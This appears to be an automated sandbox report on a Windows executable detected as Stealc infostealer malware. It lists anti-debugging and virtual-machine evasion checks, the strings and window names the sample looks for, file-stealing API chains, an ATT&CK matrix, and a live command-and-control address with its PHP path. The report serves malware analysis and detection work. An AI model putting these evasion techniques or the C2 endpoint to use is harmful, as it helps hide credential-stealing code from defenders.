Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1356A92 second address: 1356AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 jng 00007F1DD489F596h 0x0000000e jnp 00007F1DD489F596h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136EA62 second address: 136EA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136EA66 second address: 136EA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F1DD489F59Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136EA77 second address: 136EA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DD4808498h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136EA93 second address: 136EAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD489F5A9h 0x00000009 jmp 00007F1DD489F5A5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136E782 second address: 136E786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136E786 second address: 136E7BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1DD489F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DD489F5A8h 0x00000011 jmp 00007F1DD489F5A3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D1F7 second address: 137D1FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D358 second address: 137D388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A9h 0x00000007 pushad 0x00000008 jmp 00007F1DD489F5A0h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D388 second address: 137D394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D394 second address: 137D398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D62D second address: 137D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D797 second address: 137D7A1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1DD489F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D7A1 second address: 137D7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D7A7 second address: 137D7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD489F59Fh 0x00000009 jno 00007F1DD489F596h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137D7C0 second address: 137D7FF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1DD4808486h 0x00000008 jns 00007F1DD4808486h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F1DD480848Ah 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F1DD4808488h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F1DD4808499h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DC7F second address: 137DC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DC8A second address: 137DC8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DF37 second address: 137DF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0A6 second address: 137E0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F1DD480848Eh 0x0000000b jg 00007F1DD4808486h 0x00000011 pop ebx 0x00000012 push edi 0x00000013 jnp 00007F1DD4808486h 0x00000019 pop edi 0x0000001a jbe 00007F1DD480848Ah 0x00000020 push esi 0x00000021 pop esi 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F1DD4808496h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0EE second address: 137E0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0F2 second address: 137E0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0FD second address: 137E105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E105 second address: 137E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E10A second address: 137E113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381064 second address: 1381089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F1DD480848Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1DD480848Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381089 second address: 138108D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138111C second address: 1381120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381120 second address: 1381139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381139 second address: 138118C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F1DD480848Dh 0x00000010 sbb edx, 3CE3B078h 0x00000016 pop edx 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F1DD4808488h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov edx, ecx 0x00000035 mov edx, dword ptr [ebp+122D1C3Ah] 0x0000003b push 60CB17ABh 0x00000040 push ebx 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000552 second address: 50005CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov al, 13h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1DD489F5A8h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1DD489F59Eh 0x00000018 or esi, 32BF3F48h 0x0000001e jmp 00007F1DD489F59Bh 0x00000023 popfd 0x00000024 mov si, A6BFh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F1DD489F5A2h 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F1DD489F5A7h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000617 second address: 500061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500061D second address: 5000621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000621 second address: 5000625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000625 second address: 5000640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1DD489F5A0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000640 second address: 5000646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000646 second address: 500064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500064A second address: 5000674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F1DD4808499h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000674 second address: 5000678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000678 second address: 500068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD480848Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500068B second address: 50006C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F5A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1DD489F5A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50006C5 second address: 50006CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50006CB second address: 50006D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50006D1 second address: 50006D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 129FC95 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 10FDC53 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1320F39 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

graph_0-38873

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00E240F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00E1E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00E247C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00E1F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00E11710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00E1DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00E24B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00E23B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00E1BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00E1EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00E1DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E11160 GetSystemInfo,ExitProcess,

0_2_00E11160

Source: file.exe, file.exe, 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2155893924.00000000009C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWz
Source: file.exe, 00000000.00000002.2155893924.0000000000998000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2155893924.00000000009F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe	Binary or memory string: qEmud
Source: file.exe, 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe	Binary or memory string: VmCiR;k
Source: file.exe, 00000000.00000002.2155893924.0000000000998000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareV_!

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37574
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37686
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37689
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37707
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37700
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37740

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E14610 VirtualProtect ?,00000004,00000100,00000000

0_2_00E14610

Source: C:\Users\user\Desktop\file.exe

0_2_00E29BB0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E29AA0 mov eax, dword ptr fs:[00000030h]

0_2_00E29AA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00E27690

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 716, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00E29790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_00E298E0

Source: file.exe, file.exe, 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: CgProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E575A8 cpuid

0_2_00E575A8

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00E27D20

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00E26BC0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00E279E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00E27BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2155893924.0000000000998000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2114793571.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 716, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2155893924.0000000000998000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2114793571.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 716, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	33 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	33 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	13 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	334 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	44%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
s-part-0017.t-0009.t-msedge.net	0%	Virustotal	Browse
ax-0001.ax-msedge.net	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	0%, Virustotal, Browse	unknown
ax-0001.ax-msedge.net	150.171.27.10	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
tse1.mm.bing.net	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.php	true		unknown
http://185.215.113.206/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.phpS	file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpc	file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.php/	file.exe, 00000000.00000002.2155893924.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206	file.exe, 00000000.00000002.2155893924.000000000097E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.206/ws	file.exe, 00000000.00000002.2155893924.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpF	file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
